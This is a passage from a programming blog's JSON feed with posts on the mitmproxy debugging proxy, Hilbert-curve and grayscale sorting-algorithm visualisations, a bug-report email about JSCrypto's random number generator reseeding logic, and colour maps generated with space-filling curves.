request you're interested in, and modify and replay it over and\nover. You have complete control over both requests and responses - you can edit\nheaders and content using your preferred text editor, and change HTTP request\nmethods on the fly. 
You can view request and response contents using an external\nviewer (picked using your mailcap configuration), or using <strong>mitmproxy<\/strong>'s built\nin text and hexdump-like viewers.  Filters and intercepts are specified using\nregular expressions and a pretty complete mutt-like expression language.<\/p>\n<p>Another useful feature is something I call \"sticky cookies\". I often need to\nmake requests using an authenticated session. This is a pain when logins are\naction. Copying cookie values around or scripting up the login process gets old\nquick. So, <strong>mitmproxy<\/strong> lets you set cookies on requests matching a specified\nexpression as \"sticky\", which means that requests without a cookie inherit\npreviously seen cookie values. So, you can log in to the target site once using\nyour browser, and subsequent requests using tools like <strong>curl<\/strong> will\nautomagically look like they're part of an authenticated session.<\/p>\n<p>I've just sliced <strong>mitmproxy<\/strong> raw and quivering out of a much larger internal\nproblems.<\/p>\n<p>You can find releases and documentation for <strong>mitmproxy<\/strong>\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">here<\/a>. 
As usual, the real action is at the project's\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/mitmproxy\">git repository<\/a>.<\/p>\n"},{"title":"Timsort - a study in grayscale","published":"2010-01-28T00:00:00+00:00","updated":"2010-01-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/timsort-grayscale\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/timsort-grayscale\/","content":"<div class=\"media\">\n    <a href=\"timsort.png\">\n        <img src=\"timsort.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>A <a href=\"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/\">couple of days ago<\/a> I published a\nset of explosion-in-a-crayola-factory colourful sorting algorithm\nvisualisations, using a colour sequence generated with the Hilbert curve. The\nidea was that using a space-filling curve to traverse the RGB colour cube we\ncould get a large number of distinct but visually ordered colours. I contrasted\nthis with a more common method, which is to vary the intensity of a monotone to\ngenerate a gradient of colours. A couple of people suggested that I provide a\nset of grayscale images for comparison. I was curious about this too, so I\nhacked a grayscale generator into <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a>.\nThe results were striking, but not interesting enough to reproduce here in full.\nSubjectively, I think the coloured images do allow you to follow more of the\ndetail in these dense visualisations, but I'm not wedded to the idea. Being able\nto visually judge the order of elements in a sorting algorithm visualisation is\nimportant, and that is something we sacrifice in the Hilbert RGB traversal. 
I\nstill like my <a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">earlier sparse grayscale\nvisualisations<\/a> best.<\/p>\n<p>If you're curious, you can check out\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a> and generate the full set of\ngrayscale graphs with the following command:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>.\/dense -g -n 512<\/span><\/span><\/code><\/pre>\n<p>I did think the grayscale version of Python's\n<a href=\"https:\/\/corte.si\/posts\/code\/timsort\/\">Timsort<\/a> was worth sharing.  It's pretty\nspectacular due to a purely coincidental 3d effect - not much good for\nexplaining Timsort, but I'd hang it on my wall, for sure.<\/p>\n"},{"title":"Hilbert Curve + Sorting Algorithms + Procrastination = ?","published":"2010-01-26T00:00:00+00:00","updated":"2010-01-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/","content":"<p>I like the Hilbert curve. I like sorting algorithm visualisations. I\noccasionally procrastinate when I should be doing more important things. When\nall these factors converge, the result is a post like this.<\/p>\n<p>In a <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">previous post<\/a>, I drew a picture\nof a Hilbert curve by projecting a Hilbert curve traversal of the RGB colour\ncube onto a Hilbert curve traversal of the plane (yes, it's a mouthful, but it's\na mouthful of awesome). Since then, I've been pondering the general utility of\nHilbert curve traversals of the colour cube. In large-scale visualisation, we\noften want to choose an ordered sequence of colours that have the property that\ncolours close to each other on the sequence are also close to each other\nvisually. 
The easy way to do this is to restrict yourself to a specific hue, and\nto vary the intensity. I used this idea in grayscale to generate some previous\n<a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">sorting algorithm visualisations<\/a>:<\/p>\n<div class=\"media\">\n    <a href=\"insertionsort.png\">\n        <img src=\"insertionsort.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div>\n<p>The problem with this approach is that it hugely restricts the number of\ndistinct colours we can use. There are only so many distinct shades of gray the\nhuman eye can perceive - I'm already pushing it with 20 distinct colours in the\nimage above. We can do much, much better using the Hilbert curve. Let's assume\nthat human perception of RGB colours is uniform and consistent - that is, that\nany change along the RGB axes will result in a uniformly proportional difference\nin perceived colour. This assumption is incorrect, but it's good enough as a\nfirst approximation. By traversing the RGB colour cube in Hilbert order, we can\nget a set of colours that are maximally distinct from each other, with\nnear-optimal colour locality preservation (keeping in mind that perfect\nlocality preservation is impossible). In other words, we get an equidistant sequence\nof colours that are simultaneously as different from each other as possible,\nand where colours 'close' to each other on the sequence are as similar as\npossible. The result is a colour sequence that looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"swatch.png\">\n        <img src=\"swatch.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        512-colour Hilbert-order swatch\n    <\/div>\n    \n<\/div>\n<p>We do, of course, pay a price for this mathematical marvel: we can't visually\ncompare colours and see their order in the spectrum. 
When we really want a\nlarge ordered sequence of colours, this can be an acceptable tradeoff.<\/p>\n<p>Below is a re-imagining of my previous sorting algorithm visualisations, at a\nmuch larger scale than I could achieve using shades of gray. Each image shows a\nrandom list of 512 elements being sorted. The images are at a 1-pixel per\nelement resolution, and each element has a distinct colour along the Hilbert\nRGB cube traversal. The aspect ratios differ, because the width of the images\nare equal to the number of element swaps that occur during the sorting process.\nI've left out a number of algorithms that end up being too \"wide\" to be\nenjoyable - shellsort and bubblesort, I'm looking at you. Oh, and I make\nabsolutely no claims that these particular visualisations are useful or\ninformative. I made them for the same reason Mallory climbed Everest and the\nchicken crossed the road: because it's there, and to see what's on the other\nside. Come to think of it, the Mallory-Chicken Impetus explains rather a lot of\nwhat I do.<\/p>\n<h3 id=\"selection-sort\">Selection sort<\/h3>\n<div class=\"media\">\n    <a href=\"selectionsort.png\">\n        <img src=\"selectionsort.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Selection sort\n    <\/div>\n    \n<\/div><h2 id=\"insertion-sort\">Insertion sort<\/h2>\n<div class=\"media\">\n    <a href=\"insertionsort.png\">\n        <img src=\"insertionsort.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div><h3 id=\"python-s-timsort\">Python's Timsort<\/h3>\n<p>I explained the pattern you see below in a <a href=\"https:\/\/corte.si\/posts\/code\/timsort\/\">previous post visualising\nTimsort<\/a>.<\/p>\n<div class=\"media\">\n    <a href=\"timsort.png\">\n        <img src=\"timsort-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Timsort\n    <\/div>\n    \n<\/div><h3 id=\"quicksort\">Quicksort<\/h3>\n<div 
class=\"media\">\n    <a href=\"quicksort.png\">\n        <img src=\"quicksort-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Quicksort\n    <\/div>\n    \n<\/div><h2 id=\"the-code\">The code<\/h2>\n<p>As usual, I've published the code used to draw the images in this post. I\nextended <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/scurve\">scurve<\/a>, where I'm collecting\nalgorithms and visualisation techniques related to space-filling curves, to draw\ncolour swatches. Then I added a \"fruitsalad\" visualisation technique to\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a>, which houses my sorting algorithm\nvisualisation code.<\/p>\n"},{"title":"An email to the authors of JSCrypto","published":"2010-01-14T00:00:00+00:00","updated":"2010-01-14T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/jscrypto\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/jscrypto\/","content":"<div class=\"media\">\n    <a href=\"facepalm.jpg\">\n        <img src=\"facepalm.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p><strong>[Update: A fix for these problems and one noted by Peter Burns in the comments\nto this post has been posted. <a rel=\"external\" href=\"http:\/\/crypto.stanford.edu\/sjcl\/\">Get it while it's\nhot<\/a>, folks.]<\/strong><\/p>\n<p>Hi folks,<\/p>\n<p>Thanks for a <a rel=\"external\" href=\"http:\/\/crypto.stanford.edu\/sjcl\/\">blazingly fast little crypto\nlibrary<\/a>. 
Please find below a few comments on\nthe code.<\/p>\n<p>There's an error in the <strong>is_ready<\/strong> function of the random number generator.\nOn line 1386 of the <strong>jscrypto.js<\/strong> file, you have:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">return<\/span><span> (<\/span><span style=\"color: #005CC5;\">this<\/span><span>._pool_entropy[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._BITS_PER_RESEED<\/span><span style=\"color: #D73A49;\"> &amp;&amp;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">new<\/span><span> Date.<\/span><span style=\"color: #6F42C1;\">valueOf<\/span><span>()<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._next_reseed)<\/span><span style=\"color: #D73A49;\"> ?<\/span><\/span><\/code><\/pre>\n<p>This should be:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">return<\/span><span> (<\/span><span style=\"color: #005CC5;\">this<\/span><span>._pool_entropy[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._BITS_PER_RESEED<\/span><span style=\"color: #D73A49;\"> &amp;&amp;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">new<\/span><span style=\"color: #6F42C1;\"> Date<\/span><span>().<\/span><span style=\"color: #6F42C1;\">valueOf<\/span><span>()<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._next_reseed)<\/span><span style=\"color: #D73A49;\"> ?<\/span><\/span><\/code><\/pre>\n<p>In Safari, this will cause 
an error and script termination. In Firefox, the\neffect is much worse - <b>new Date.valueOf()<\/b> returns an object, which never\ncompares as greater than any integer. As an unfortunate consequence, that clause\ncan never evaluate to true, and your <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Fortuna_(PRNG)\">Fortuna<\/a> implementation's\nperiodic reseeding never triggers...<\/p>\n<p>All is not lost, though, because luckily the <strong>random_words<\/strong> function in which\nthe return value from <strong>is_ready<\/strong> is used makes no sense. ;-) To start with, on\nline 1289 you have:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (readiness<\/span><span style=\"color: #D73A49;\"> ==<\/span><span style=\"color: #005CC5;\"> this<\/span><span>.<\/span><span style=\"color: #005CC5;\">NOT_READY<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>But readiness here is a bit field, and this clause will evaluate to false in\nhalf the situations that <strong>is_ready<\/strong> actually does return NOT_READY. 
You\nsurely want<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (readiness<\/span><span style=\"color: #D73A49;\"> &amp;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>.<\/span><span style=\"color: #005CC5;\">NOT_READY<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>Three lines further down, you have:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">else if<\/span><span> (readiness<\/span><span style=\"color: #D73A49;\"> &amp;&amp;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>.<\/span><span style=\"color: #005CC5;\">REQUIRES_RESEED<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>This, again, doesn't do what it seems - &amp;&amp; is the boolean and, not the bitwise\nand. Since <strong>this.REQUIRES_RESEED<\/strong> is simply a positive constant, that really\nbecomes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">else if<\/span><span> (readiness)<\/span><\/span><\/code><\/pre>\n<p>So despite the bug in <strong>is_ready<\/strong>, your reseeding function actually runs every\ntime random data is requested. Phew - who says two wrongs don't make a right,\ney? Reseeding every time data is requested might open the generator to some\ninteresting entropy exhaustion attacks, but is much better than not reseeding at\nall.<\/p>\n<p>A corollary to all this is that you also need to address the fact that the\nreturn value from <strong>is_ready<\/strong> is used incorrectly in the rest of your code and\nyour examples. 
As it stands, testing for readiness with<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (Random.<\/span><span style=\"color: #6F42C1;\">is_ready<\/span><span>())<\/span><\/span><\/code><\/pre>\n<p>is wrong, because your readiness function can return <strong>REQUIRES_RESEED |\nNOT_READY<\/strong>, which is a positive integer. I'd recommend changing the interface\nof <strong>is_ready<\/strong> to have an obvious boolean return value instead, though -\ntyping<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (Random.<\/span><span style=\"color: #6F42C1;\">is_ready<\/span><span>()<\/span><span style=\"color: #D73A49;\"> &amp;<\/span><span> Random.<\/span><span style=\"color: #005CC5;\">IS_READY<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>is a bit of a mouthful.<\/p>\n<p>Thanks again for jscrypto.<\/p>\n<br\/>\n<br\/>\n<p>Regards,<\/p>\n<br\/>\n<p>Aldo<\/p>\n<p><strong>[No animals were harmed producing this post. Content lightly edited for\nmarkup and formatting from the original email. 
Yes, I really do like JSCrypto -\nthis error-hiding-an-error was amusing, but the AES implementation seems good\n(although the jury's still out on the SHA256 portion).]<\/strong><\/p>\n"},{"title":"Generating colour maps with space-filling curves","published":"2010-01-07T00:00:00+00:00","updated":"2010-01-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/hilbert\/swatches\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/hilbert\/swatches\/","content":"<p>After my post about my <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">Quixotic quest to draw a portrait of the Hilbert\ncurve<\/a>, Chris Mueller pointed me to some\n<a rel=\"external\" href=\"http:\/\/visualmotive.com\/colorsort\/\">fascinating related work<\/a> he had done\ngenerating colour maps of images.  Chris's method was to extract the colours\nfrom an image, sort them in natural order, and then draw the pixels out onto a\nHilbert curve. The results are pretty, but have a blotchiness that demonstrates\nthe poor clustering properties of a natural order sort nicely. If you've read my\nprevious post (you have, haven't you?), you'll be immediately struck by the idea\nthat we can improve this by sorting the pixels in order of the 3d Hilbert curve\ntraversal of the RGB colour cube (you were, weren't you?). This would give us\nnear optimal clustering, keeping similar colours together and eliminating the\nblotchiness.  If we have a Hilbert-order sorting of the pixels, we can also\nproject this onto other traversals of the pixels of the destination image. 
Using\nthe ZigZag curve I introduced in the previous post produces a very nice result\ntoo, showing that the order in which the RGB cube is traversed is more important\nthan the destination map.<\/p>\n<p>In the images below, <strong>natural<\/strong> is a natural-order colour sort projected onto\na Hilbert curve (Chris's method), <strong>hilbert<\/strong> is a Hilbert-curve order colour\nsort projected onto a Hilbert curve, and <strong>zigzag<\/strong> is a Hilbert-curve order\ncolour sort projected onto a ZigZag curve. I've used the same images Chris used\nto make comparison with his other interesting visualisations easy.<\/p>\n<div class=\"media left\">\n    <a href=\"original_candleslime.png\">\n        <img src=\"original_candleslime.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_candleslime.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_candleslime.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_candleslime.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_girlpeach.png\">\n        <img src=\"original_girlpeach.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_girlpeach.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_girlpeach.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_girlpeach.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_landscape.png\">\n        <img src=\"original_landscape.png\"  
\/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_landscape.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_landscape.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_landscape.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_tents.png\">\n        <img src=\"original_tents.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_tents.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_tents.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_tents.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_tigersnack.png\">\n        <img src=\"original_tigersnack.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_tigersnack.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_tigersnack.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_tigersnack.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<h2 id=\"sources\">Sources<\/h2>\n<p>The images are from the Flickr Creative Commons collection. 
The tiger image is\n\u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/nikonvscanon\/2427517125\/\">David Blaikie<\/a>.\nThe girl image is \u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/savannahgrandfather\/312427606\/\">Bruce\nTuten<\/a>.  The still\nlife is \u00a9\n<a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/8363028@N08\/3077370592\/in\/photostream\/\">DeusXFlorida<\/a>.\nThe beach image is \u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/hamed\/2476599906\/\">Hamed\nSaber<\/a>.  The tent image is\n\u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/drusbi\/1318108463\/\">drusbi<\/a>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>I've updated the <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/scurve\">scurve<\/a> project (where I'm\ncollecting algorithms and visualisation tools related to space-filling curves)\nto include a \"colormap\" tool to generate colour maps. The images above were can\nbe generated using commands of the following form:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    colormap<\/span><span style=\"color: #005CC5;\"> -s 128 -c<\/span><span> [colour<\/span><span style=\"color: #032F62;\"> traversal]<\/span><span style=\"color: #005CC5;\"> -m<\/span><span> [map] src destination<\/span><\/span><\/code><\/pre>\n<p>There are a lot of other striking permutations and combinations to explore -\nthe colour traversal and destination map can be any of the space-filling curves\nsupported by <strong>scurve<\/strong>.<\/p>\n"},{"title":"Portrait of the Hilbert curve","published":"2010-01-03T00:00:00+00:00","updated":"2010-01-03T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/","content":"<div 
class=\"media\">\n    <a href=\"hilbert2d-o4.png\">\n        <img src=\"hilbert2d-o4.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Hilbert curve of order 4\n    <\/div>\n    \n<\/div>\n<p>The <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Hilbert_curve\">Hilbert curve<\/a> is a remarkable\nconstruct in many ways, but the thing that makes it <em>useful<\/em> in computer science\nis the fact that it has good clustering properties. If we take a curve like the\none above and straighten it out, points that are close together in the\ntwo-dimensional layout will also tend to be close together in the linear\nsequence.  I say \"tend to be\", because we can never get this perfectly right -\nwe can show that any curve of this type will have some points that are close to\neach other spatially but far from each other on the curve.\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.37.3138&amp;rep=rep1&amp;type=pdf\">It<\/a>\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.129.1888&amp;rep=rep1&amp;type=pdf\">turns<\/a>\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.24.8236&amp;rep=rep1&amp;type=pdf\">out<\/a>,\nhowever, that the clustering behaviour of the Hilbert curve is pretty much as\ngood as we can currently get. For one example of how this property can be\nuseful, imagine that we have a database with two indexes - X and Y. We know that\nwe will be doing frequent queries on those indexes, asking for records where X\nand Y fall within specified ranges.  We can visualise this as retrieving\nrectangular regions from a two-dimensional space.  Given this scenario, how can\nwe lay out the records on disk to minimise disk access? Information on disk is\nstored sequentially, so what we want is a layout that maximises the likelihood\nthat records in any given rectangular region will also be adjacent on disk. 
In\nother words, what we want is a way to order our two-dimensional space of records\nso that records close to each other in two dimensions also tend to be close to\neach other in the sequential order. This is exactly the outstanding property of\nthe Hilbert curve, so one solution is to store our records on disk in Hilbert\norder.<\/p>\n<h2 id=\"visualising-the-hilbert-curve-a-first-stab\">Visualising the Hilbert curve: A first stab<\/h2>\n<p>I've long felt that the usual visualisation of the Hilbert curve - like the one\nshown at the top of this post - doesn't really do its clustering properties\njustice. The lines-and-vertices approach demonstrates how to <em>construct<\/em> the\ncurve very nicely, but it doesn't give us any intuitive feel for how close\npoints on the curve are to each other on the plane. In the remainder of this\npost, I take a stab at visualising the Hilbert curve as the great mathematician\nin the sky intended - completely covering the plane, and with each pixel\nvisually encoding its proximity to its neighbours along the curve.<\/p>\n<p>One way to proceed would be to find a way to assign a colour to every pixel in a\nHilbert-order traversal of a square image. Imagine the RGB colour space as a\ncube where each colour is uniquely identified by a set of (r, g, b)\nco-ordinates. Here's one with 20 colours to a side:<\/p>\n<div class=\"media\">\n    <a href=\"ccube.png\">\n        <img src=\"ccube.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        A 20x20x20 RGB colour cube\n    <\/div>\n    \n<\/div>\n<p>We'll use a somewhat larger colour cube - 256 colours to a side, giving us 16\n777 216 unique colours. This colour cube is familiar to pretty much everyone,\nsince it's precisely the colour space we use when we specify HTML-style #rrggbb\ncolours. We can project the RGB colour cube at 1:1 resolution onto a square with\n4096 pixels to a side (4096 x 4096 = 16 777 216 pixels) - this exactly matches a Hilbert curve of order 12. 
Now we\nneed a method for traversing the colours in the colour cube. One trivial way to\ndo this is to simply snake through all the points in the cube. In two\ndimensions, it would look like this:<\/p>\n<div class=\"media\">\n    <a href=\"zigzag-o4.png\">\n        <img src=\"zigzag-o4.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        16x16 Zigzag\n    <\/div>\n    \n<\/div>\n<p>This generalises to 3 or more dimensions easily - just imagine \"stacking\"\nplates of two-dimensional traversals in such a way that one plate's end point\nis adjacent to the next plate's starting point. For want of a better term, I've\ncalled this Zigzag order. When we project a Zigzag traversal of the RGB\ncolourspace onto a Hilbert-order traversal of the plane, we get this:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-zigzag-fullsize.png\">\n        <img src=\"hilbert-zigzag-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Zigzag on Hilbert\n    <\/div>\n    \n<\/div>\n<p>That's... ugly. You can vaguely make out the shape of the Hilbert curve by\ndividing the image into quadrants, and traversing them in the order in which\nthey blend into each other. But there's a problem - if we traverse the RGB\ncolour space in Zigzag order, many colours that are close to each other in 3d\nspace - and therefore visually similar - are quite far from each other in our\ntraversal order. This is what causes the blotchy artifacts in the image above.\nWhat we really want is a traversal of the RGB colour space that is as smooth and\ncontinuous as possible - meaning that colours that are close to each other in\nthe cube are also as close as possible to each other in the traversal order.\nWait a minute... that sounds familiar, doesn't it?<\/p>\n<h2 id=\"drawing-the-hilbert-curve-in-n-dimensions\">Drawing the Hilbert curve in N dimensions<\/h2>\n<p>What we really want is a 3d Hilbert curve traversal of the RGB colour cube. 
This\nwould mean that our colour clustering - making sure that similar colours are as\nclose as possible to each other in the sequence - would be close to optimal. We\nshould then see the clustering properties of the 2d Hilbert curve as patches of\nsimilar colour. So, does a 3d analogue to the Hilbert curve exist? Sure it does - here's\na somewhat befuddling picture of an example rendered with POV-Ray:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert3d-o3.png\">\n        <img src=\"hilbert3d-o3.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        3d Hilbert curve of order 3 - the green bulb is the start of the curve\n    <\/div>\n    \n<\/div>\n<p>We can do even better than 3 dimensions, though, by generalising the Hilbert\ncurve to N dimensions. Concretely, we would like to find a way to translate an\noffset along the N-dimensional Hilbert curve to co-ordinates, and vice-versa.\nThe algorithms to do this are somewhat tricky, but are well known and widely\ndescribed. A particularly nice exposition can be found in the paper <a rel=\"external\" href=\"http:\/\/www.cs.dal.ca\/research\/techreports\/cs-2006-07\">\"Compact\nHilbert Indices\"<\/a> by Chris\nHamilton. This section is based on Hamilton's version of the classic algorithm\nfirst devised by A. R. Butz in the 1970s (though, see comments in my code for\ncorrections to some minor errors in the paper that may trip up implementers).<\/p>\n<p>We start with a slight detour - the surprising connection between the Hilbert\ncurve and <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Gray_code\">Gray codes<\/a>. Recall that Gray\ncodes are a way to traverse all numbers of a given bit width in such a way that\nonly one bit differs from each value to the next. 
Here, for example, are the\n2-bit and 3-bit Gray codes:<\/p>\n<h3 id=\"2-bit\">2-bit<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>0, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 0<\/span><\/span><\/code><\/pre><h3 id=\"3-bit\">3-bit<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>0, 0, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 0, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 1, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 1, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 1, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 1, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 0, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 0, 0<\/span><\/span><\/code><\/pre>\n<p>Now, watch what happens when we treat each set of bits in the N-bit Gray code\nas co-ordinates in N-dimensional space (with X being the rightmost bit), and\ndraw the resulting curves:<\/p>\n<table class=\"spacertable\">\n    <tr>\n        <th width=\"50%\">\n            2-bit\n        <\/th>\n        <th>\n            3-bit\n        <\/th>\n    <\/tr>\n    <tr>\n        <td valign=\"top\">\n            <img src=\"hilbert2d-o1.png\" alt=\"Hilbert 2d O1\"\/>\n        <\/td>\n        <td valign=\"top\">\n            <img src=\"hilbert3d-o1.png\" alt=\"Hilbert 3d O1\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<p>Voila, the Order 1 Hilbert curves in 2 and 3 dimensions! A bit of pondering\nshows that this generalises to any dimension - if we have a hypercube with\ndimensions 